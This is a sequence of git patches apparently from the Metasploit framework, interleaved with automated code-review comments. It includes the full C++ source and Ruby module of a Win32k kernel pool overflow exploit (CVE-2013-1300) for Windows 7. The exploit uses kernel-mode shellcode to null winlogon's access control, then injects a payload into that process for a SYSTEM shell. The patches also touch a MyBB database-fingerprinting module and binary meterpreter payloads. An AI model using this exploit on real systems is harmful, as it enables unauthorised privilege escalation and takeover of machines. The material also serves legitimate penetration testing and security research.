CheckCode::Unknown + return Exploit::CheckCode::Unknown end - return CheckCode::Detected + return Exploit::CheckCode::Detected end - def exploit + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') response = send_request_raw( { 
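Review bot: In `check` (hunk `@@ -59,12 +59,12 @@`), `res.code` is read right after the `begin`/`rescue` block without testing `res` for nil; as far as I know the framework's HTTP client returns nil on a timeout instead of raising, so an unresponsive host would surface as a `NoMethodError` rather than `CheckCode::Unknown`. `if res.nil? || res.code != 200` covers both cases. The bare `rescue` in the same hunk reports every `StandardError` as a connection failure; naming the connection errors would keep coding mistakes visible. The `run` hunk (`@@ -109,7 +109,7 @@`) reads `response.body` and may need the same guard if none exists above it, outside the hunk.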
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Database is: PostgreSQL ;)") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) print_good("Database is: SQLite ;)") - else response.body.match(/Member List/) + else print_status("Database MySQL or this is not forum MyBB or unknown Database") end From 2a1e96165cf1a4b627d543c0add64e39ef4d72b5 Mon Sep 17 00:00:00 2001 From: kyuzo Date: Thu, 6 Mar 2014 18:39:34 +0000 Subject: [PATCH 041/853] Adding MS013-058 for Windows7 x86 --- data/exploits/cve-2013-1300/schlamperei.dll | Bin 0 -> 10240 bytes .../source/exploits/cve-2013-1300/dllmain.cpp | 288 ++++++++++++++++++ .../windows/local/ms13_058_schlamperei.rb | 129 ++++++++ 3 files changed, 417 insertions(+) create mode 100644 data/exploits/cve-2013-1300/schlamperei.dll create mode 100644 external/source/exploits/cve-2013-1300/dllmain.cpp create mode 100644 modules/exploits/windows/local/ms13_058_schlamperei.rb 
diff --git a/data/exploits/cve-2013-1300/schlamperei.dll b/data/exploits/cve-2013-1300/schlamperei.dll new file mode 100644 index 0000000000000000000000000000000000000000..68b6fe9b1d42adbe5d8d66c83aa00676cbea8428 GIT binary patch literal 10240 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 0) LONG NTSTATUS; +typedef NTSTATUS *PNTSTATUS; +#endif + +#define MAX_PAGE 4096 + +#define TABLE_BASE 0xff910000 + +// global variables FTW +HWND gHwnd = 0x0; +unsigned int gEPROCESS = 0x0; +unsigned gPid = 0x0; + +typedef struct _HANDLEENTRY { + VOID *phead; + VOID *pOwner; + UINT8 bType; + UINT8 bFlags; + UINT16 wUniq; +} HANDLEENTRY, *PHANDLEENTRY; + +DWORD gethandleaddress(HANDLE h) { + HMODULE mod = GetModuleHandleA("user32.dll"); + DWORD* sharedinfo = (DWORD*)GetProcAddress(mod, "gSharedInfo"); + PHANDLEENTRY handles = (PHANDLEENTRY)sharedinfo[1]; + DWORD index = (DWORD)h&0x3ff; + HANDLEENTRY entry = handles[index]; + return (DWORD)entry.phead; +} + +DWORD kernelwndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { + WORD um=0; + __asm { + mov ax, cs + mov um, ax + } + if(um == 0x1b) { + + } else { + // KERNEL MODE CODE EXECUTION + // shellcode to change ACL of winlogon.exe to 0x0 + __asm { + mov eax, hwnd // WND + mov eax, [eax+8] // THREADINFO + mov eax, [eax] // ETHREAD + mov eax, [eax+0x150] // KPROCESS + mov eax, [eax+0xb8] // flink + procloop: + lea edx, [eax-0xb8] // KPROCESS + mov eax, [eax] + add edx, 0x16c // module name + cmp dword ptr [edx], 0x6c6e6977 // "winl" for winlogon.exe + jne procloop + sub edx, 0x170 + mov dword ptr [edx], 0x0 // null acl + mov eax, [edx + 0xb8] // write winlogon pid to global var + mov gPid, eax + } + return 0x201000; + } + return DefWindowProcW(hwnd,msg,wparam,lparam); +} + +HWND createhelperwnd() { + WNDCLASSA wndclass; + HANDLE hinst = GetModuleHandleA(0); + DWORD rc = 0; + + wndclass.style = 0x4000; + wndclass.lpfnWndProc = (WNDPROC)kernelwndproc; + wndclass.cbClsExtra = 0; + wndclass.cbWndExtra = 0; + 
wndclass.hInstance = (HINSTANCE)hinst; + wndclass.hIcon = LoadIconA(0, (LPCSTR)0x107); + wndclass.hCursor = 0; + wndclass.hbrBackground = (HBRUSH)6; + wndclass.lpszMenuName = 0; + wndclass.lpszClassName = (LPCSTR) 0x1338; + rc=RegisterClassA(&wndclass); + HWND windowhandle = CreateWindowExA(0, (LPCSTR) 0x1338, "helper", 0, 0, 0, 0, 0, 0, 0, 0, hinst); + + return windowhandle; +} + +typedef NTSTATUS __stdcall NtAllocateVirtualMemory_T(HANDLE processHandle, + PVOID *baseAddress, + ULONG_PTR zeroBits, + PSIZE_T regionSize, + ULONG allocationType, + ULONG protect); + +BOOL AllocFakeEProcess(DWORD address) { + unsigned int addr = 0x200000; + DWORD allocsize = 0x4000; + int x=0; + + NtAllocateVirtualMemory_T * pfnNtAllocateVirtualMemory = 0; + pfnNtAllocateVirtualMemory = (NtAllocateVirtualMemory_T *)GetProcAddress( + GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory"); + + + unsigned o = (0x20 / 4); // the offset into the page + NTSTATUS res = 0x0; + + for(x=0; x<0x60; x++) { + res = pfnNtAllocateVirtualMemory((HANDLE)0xffffffff, (PVOID*)&addr, 0, &allocsize, 0x3000, 0x40); + if(res == 0x0) { + + break; + } + + addr += 0x10000; + } + if(res!=0) return false; + memset((void*)addr, 0xab, 0x4000); + UINT *eprocess = (UINT*)addr+o; + UINT *before = (UINT*)addr; + // large enough values to hold reference + before[2] = 0x00080000; + before[3] = 0x400000; + UINT *second = (UINT*)addr + (0x1000/4); + for(x=0; x<100; x++) eprocess[x] = (0xdead<<16) + (0xaa00 | x); + + eprocess[0] = 0x03030303; // least significant byte == 0x3 + + // Pointer to EPROCESS_QUOTA_BLOCK + // Will point into the window object and on decrement flip the flag to enable the kernel mode window procedure + eprocess[0xd4/4] = address; + + gEPROCESS = (unsigned int)eprocess; + //for(x=0; x<100; x++) second[x] = (0xbeef<<16) + (0xbb00 | x); + //second[0x20] = 0x2; + //second[0x30] = 0x1; + return true; +} + +DWORD wndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { + if(msg == 0xd) { + // 
triggering the exploit through WM_GETTEXT + // printf("[-] WM_GETTEXT message\n"); + unsigned char payload[] = "ABCDE "; + payload[7] = (gEPROCESS>>16) & 0xff; + memcpy((void *) lparam, (void *)payload, 8); + return 8; + } + return DefWindowProcA(hwnd, msg, wparam, lparam); +} + +DWORD windowthreadproc(LPVOID arg) { + WNDCLASSA wndclass; + HANDLE hinst = GetModuleHandleA(0); + DWORD rc = 0; + MSG msg; + + wndclass.style = 0x4000; + wndclass.lpfnWndProc = (WNDPROC)wndproc; + wndclass.cbClsExtra = 0; + wndclass.cbWndExtra = 0; + wndclass.hInstance = (HINSTANCE)hinst; + wndclass.hIcon = LoadIconA(0, (LPCSTR)0x107); + wndclass.hCursor = 0; + wndclass.hbrBackground = (HBRUSH)6; + wndclass.lpszMenuName = 0; + wndclass.lpszClassName = (LPCSTR) 0x1337; + rc=RegisterClassA(&wndclass); + + HWND windowhandle = CreateWindowExA(0, (LPCSTR) 0x1337, "Jon Rocks!", 0, 0, 0, 0, 0, 0, 0, 0, hinst); + + gHwnd = windowhandle; + + while(1) { + GetMessageA(&msg, 0x0, 0x0, 0x0); + TranslateMessage(&msg); + DispatchMessageA(&msg); + } + + return 0; +} + +DWORD NtUserMessageCall(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam, DWORD result, DWORD fnid, DWORD ansi) { + __asm { + push ansi + push fnid + push result + push lparam + push wparam + push msg + push hwnd + push 0xdeadbeef + mov eax, 11eah + mov edx, 7ffe0300h + call [edx] + add esp, 20h + } +} + +typedef struct _CLIENT_ID +{ + PVOID UniqueProcess; + PVOID UniqueThread; +} CLIENT_ID, *PCLIENT_ID; + +typedef long (*_RtlCreateUserThread)(HANDLE, + PSECURITY_DESCRIPTOR, + BOOLEAN,ULONG, + PULONG,PULONG, + PVOID,PVOID, + PHANDLE,PCLIENT_ID); + +_RtlCreateUserThread RtlCreateUserThread; + +int Schlamperei(LPVOID shellcode) +{ + // Create window which will execute the wndproc in kernel mode + HWND wnd = createhelperwnd(); + + // Retrieve memory address of window using gSharedInfo + DWORD addressofwnd = gethandleaddress(wnd); + + HMODULE ntdll=LoadLibraryA("ntdll.dll"); + 
RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread"); + + // Allocate fake EPROCESS in user mode + // see "Kernel Pool Exploitation on Windows 7" by Tarjei Mandt + if(!AllocFakeEProcess(addressofwnd-0x80+0x15)) { + return 0; + } + + // Create window in new thread to trigger inter thread message sending + HANDLE thread = CreateThread(0,0,(LPTHREAD_START_ROUTINE)windowthreadproc,0,0,0); + + Sleep(0x1000); + + // 0x9 is size of allocation, results in buffer (8 + 4) = 12 + // 8 byte block allocations = 16 bytes + // so we will copy in 8*2 bytes = 16 bytes to corrupt the pool pointer + unsigned char *buf = (unsigned char *)malloc(16); + for(int i=0; i<0x40; i++) { + NtUserMessageCall(gHwnd, 0xd, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10); + } + + SendMessage(wnd, 0x401, addressofwnd, 0x0); + + ExitProcess(0); +} + +extern HINSTANCE hAppInstance; + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { + BOOL bReturnValue = TRUE; + switch (dwReason) { + case DLL_QUERY_HMODULE: + hAppInstance = hinstDLL; + if (lpReserved != NULL) { + *(HMODULE *)lpReserved = hAppInstance; + } + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + Schlamperei(lpReserved); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +}; + + diff --git a/modules/exploits/windows/local/ms13_058_schlamperei.rb b/modules/exploits/windows/local/ms13_058_schlamperei.rb new file mode 100644 index 0000000000..069cb6e5fd --- /dev/null +++ b/modules/exploits/windows/local/ms13_058_schlamperei.rb 
@@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/post/windows/reflective_dll_injection' +require 'rex' + +class Metasploit3 < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::FileInfo + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'ms13_053_schlamperei', + 'Description' => %q{ + A kernel pool overflow in Win32k which allows local privilege escalation. Used in pwn2own 2013 to break out of chrome's sandbox. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nils&Jon (MWR) - original exploit', # vulnerability discovery and initial exploit + 'Donato&BenCampbell (MWR) - ported to metasploit' # porting vuln to metasploit + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + [ 'Windows 7 SP0/SP1', { } ] + ], + 'Payload' => + { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => + [ + [ 'CVE', '2013-1300' ], + [ 'MSB', 'MS13-053' ], + [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ] + ], + 'DisclosureDate' => 'Dec 01 2013', + 'DefaultTarget' => 0 + })) + end + + def check + os = sysinfo["OS"] + if (os =~ /windows/i) == nil + return Exploit::CheckCode::Unknown + end + + file_path = expand_path("%windir%") << "\\system32\\win32k.sys" + major, minor, build, revision, branch = file_version(file_path) + vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") + + case build + when 7600 + return Exploit::CheckCode::Vulnerable + when 7601 + return Exploit::CheckCode::Vulnerable if revision <= 1800 + end + 
return Exploit::CheckCode::Unknown + end + + + def exploit + if is_system? + fail_with(Exploit::Failure::None, 'Session is already elevated') + end + + if sysinfo["Architecture"] =~ /wow64/i + fail_with(Failure::NoTarget, "Running against WOW64 is not supported") + elsif sysinfo["Architecture"] =~ /x64/ + fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") + end + + if check != Exploit::CheckCode::Vulnerable + fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") + end + + print_status("Launching notepad to host the exploit...") + notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) + begin + process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + rescue Rex::Post::Meterpreter::RequestError + print_status("Operation failed. Trying to elevate the current process...") + process = client.sys.process.open + end + + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.dll") + library_path = ::File.expand_path(library_path) + + print_status("Injecting exploit into #{process.pid}...") + exploit_mem, offset = inject_dll_into_process(process, library_path) + + thread = process.thread.create(exploit_mem + offset) + client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) + + processes = client.sys.process.get_processes + processes.each do |p| + if p['name'] == "winlogon.exe" + winlogon_pid = p['pid'] + print_status("Found winlogon.exe with PID #{winlogon_pid}") + if execute_shellcode(payload.encoded, nil, winlogon_pid) + print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell") + else + print_error("Failed to start payload thread") + end + break + end + end + end + +end + From 257c121c7538df426d719373b3d7eae10a63da0c Mon Sep 17 00:00:00 2001 
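Review bot: The module's identifiers disagree with each other: the file is `ms13_058_schlamperei.rb` and the subject says MS013-058, while `'Name' => 'ms13_053_schlamperei'` and `[ 'MSB', 'MS13-053' ]` inside it name a different bulletin, so one of the two should be corrected after checking the bulletin for CVE-2013-1300. `'Name'` is also a file-style slug where the other modules in this series use a readable title. In `exploit` the failure constants mix `Exploit::Failure::None` with `Failure::NoTarget`; one form throughout, e.g. `fail_with(Failure::None, 'Session is already elevated')`, reads more clearly. The header URL `http//metasploit.com/download` is missing its colon, here and in the header that PATCH 043 adds to myBB_GetTypeDB.rb.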
From: kyuzo Date: Thu, 6 Mar 2014 20:34:01 +0000 Subject: [PATCH 042/853] Adding MS013-058 for Windows7 x86 --- modules/exploits/windows/local/ms13_058_schlamperei.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/ms13_058_schlamperei.rb b/modules/exploits/windows/local/ms13_058_schlamperei.rb index 069cb6e5fd..9deaf504e2 100644 --- a/modules/exploits/windows/local/ms13_058_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_058_schlamperei.rb @@ -25,8 +25,9 @@ class Metasploit3 < Msf::Exploit::Local 'License' => MSF_LICENSE, 'Author' => [ - 'Nils&Jon (MWR) - original exploit', # vulnerability discovery and initial exploit - 'Donato&BenCampbell (MWR) - ported to metasploit' # porting vuln to metasploit + 'Nils&Jon (MWR) - original exploit', + 'Donato Capitella - ported to metasploit', + 'Ben Campbell - ported to metasploit' ], 'Arch' => ARCH_X86, 'Platform' => 'win', From 6d748f49d31c7524511d6501c6490236b33b812f Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 7 Mar 2014 10:49:30 -0800 Subject: [PATCH 043/853] Update myBB_GetTypeDB.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1.I added comment header; 2.I made ​​a link to your account as a comment; 3.I added a link https://github.com/rapid7/metasploit-framework/pull/3070 Items 2 and 3 on the advice wchen-r7 --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 5b14a969c7..9106a4f746 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary 
@@ -15,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary
 },
 'Author' =>
 [
- 'Arthur Karmanovskii', # Discovery
- 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module
+ # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
+ 'Arthur Karmanovskii ' # Discovery and Metasploit Module
 ],
 'License' => MSF_LICENSE,
 'References' =>
 [
- [ '0 - days', '2014-13-02' ]
+ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ]
 ],
 'Privileged' => false,
 'Platform' => ['php'],
@@ -115,4 +120,3 @@ class Metasploit3 < Msf::Auxiliary
 end
 end
-
From 6616d36d6313ff35739c1f3f71d3d15ae35ba03c Mon Sep 17 00:00:00 2001
From: joe
Date: Fri, 7 Mar 2014 13:21:30 -0800
Subject: [PATCH 044/853] New meterpreter bins for testing.
---
 data/android/apk/AndroidManifest.xml | Bin 3588 -> 3536 bytes
 data/android/apk/classes.dex | Bin 6844 -> 10700 bytes
 data/android/apk/resources.arsc | Bin 1104 -> 1088 bytes
 data/android/meterpreter.jar | Bin 37661 -> 37700 bytes
 data/android/metstage.jar | Bin 1993 -> 1851 bytes
 data/android/shell.jar | Bin 1853 -> 1853 bytes
 data/meterpreter/ext_server_stdapi.jar | Bin 38782 -> 38782 bytes
 data/meterpreter/meterpreter.jar | Bin 24427 -> 24427 bytes
 8 files changed, 0 insertions(+), 0 deletions(-)
diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 39fa1cea0e34dfb14a1666dbe18fab55ba0fbcbb..6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9 100644 GIT binary patch literal 3536 zcmb`JO>oYOe0h1b$nZR z-qnpA@npwHc#h+@mblUZZD9Wv?+xg$(BC4y!{|C%`b2ls<7(@3eah7(@($jccy?9K z{OgIkiQg&_chMbuyXk%>7c{fA@ms@hRX^Y-PRiUZ=Kem#^{~y9%z9d9kMS;X8!5vc z8Fa}m;%oX0%eh4Qi4o6z7V(Zqhc&RZ8SA7S>oVToW$9>|eX#yIGwt@PYhFz)>kFQh zCcn$DKN>Nz!CB4`)8bkwqi^auq-)%_U^Nn1`gmW&IapsoYca=)7Py;B#Cdwnedl>O zt$1(Z=@Ii>BBO>bk=2*FnzAu(c*UdczSq`Fq?Q&TNXK6y2k-to??-?3e*B4-iuY-G z9SwH+60GZFaBM_^Ph){=co(FTBSsJQ(C6%D(9hFy+JjRgGH#One0s)Ki2Xk(K96NC zzZF+fE=NYp#k;Xc^b*>&%~iwiw(HX>?{&PF6Wpz(`}^2>`Wf#j-todE{Ez4ADr*1Ex>rxsh<26h&u(we+DL14z3S(AoBDMRvh&(~mcyC2 zLV9I`h&oS$pQI+IaW(CQ^lLEzhk7(t6tl=AQd3ckAqAphTJJH=XGTwHeAcL@++)9G zjo9w?8vPkAK0&G3&&^{Ke1;18wpmXi*lN}ue-(YGv{{>f0d0SeyYXpFe8;<`JkTC9 z-}BbWeDk>Ac^><_y-wfx4)e@7j5s&z;N@|_^P2m#=kumZo^|l@xZrv1RlGM!o^|l@ zxZuV9zG%H~mOSg=<#ECD8C2!>R>`vtULF@bpFtIGrsP=%FOLhJ&#a2~cFD62ULF@b zpIH^}oswrAygV*=KC>#`yCu&$czIm#d}dWVzrTK-t%H}x1=w1^JM}B!+@H}@F?`X-h4qhH--U8#^?VYz-CN4$P(v(A*ZV4dLJtZ15^w1ygV-KW(3c3hTXAY_dbQ)>khlmBJ3Xy*}l_wPQ-baoO>L%C0_Ui+-Q*0c5`2JM{fcitFJu zT{0VK{5^cT#BHSvdt}fhyNIvpeJt-0RcCD7#JGs|Oi7aiwtKX7(oA+~@6Wz818FeN z20iWfYiLm|t?Co@QH$SI*l!LQ*<_99iD~n!mC;vq8Peyxw_!CCS$g}Ki1V<%fYzpu zH7)TrpNNapTF;#4r)k6o6VDHs=L#7$b&0I5Xdz`|-r$Iboqdn3l}K$ZLy*oqMGl_* zMb1sX_kR4@r;7J#c^pk<`Vy?mWN>;&f>&dSXK)szxgn!>=g{lyJ?Q(Pv7G` z&PiX!?z^ygK&$ONPOpD2a-VF#^?QfdqyO=I>x%C}e(ndOearQGx3_z3rm^~#>F0Ti z`|B=b=e2(=_p+ycQX6^Q4=o6*Q+WZgE?$7Nme0me# z@h&M3wA;*gzqK;oJT7?8mHv*Ir0#qNd1g!@@M_k<%j1IQyv=esjQ4!WvkqP!7d+2l zpLRI!WXZD*ULF@b&t()_>a!Sfna z@m?x<*1^l;g6BO@#e2ErSqCqV3!e8t70>6*`_DRfd0gB7ywlY4 z`;b4!Q#qeh~W(Ad5nwA+XlLq_aG9CV+PXfNAcL|&F2B7YUp6G(hCm*``l zlo54-bzm#l0d|8uU;-Fm3S0@U1z!e-!4Ys2+zh@2ZU^^(`@!FUN5J>NE8s)mEGMb~ zOTfiI2VVt`fwzFYf@nV222$W_;6d^J|DUgDqeH>;Qibt^zlJ zd%+LDOW+S+Zir|pSOM08esC!m1xb(ve+I4rH-KBf9pD&v9{e2q8hijg0%|Q$Ggt;z 
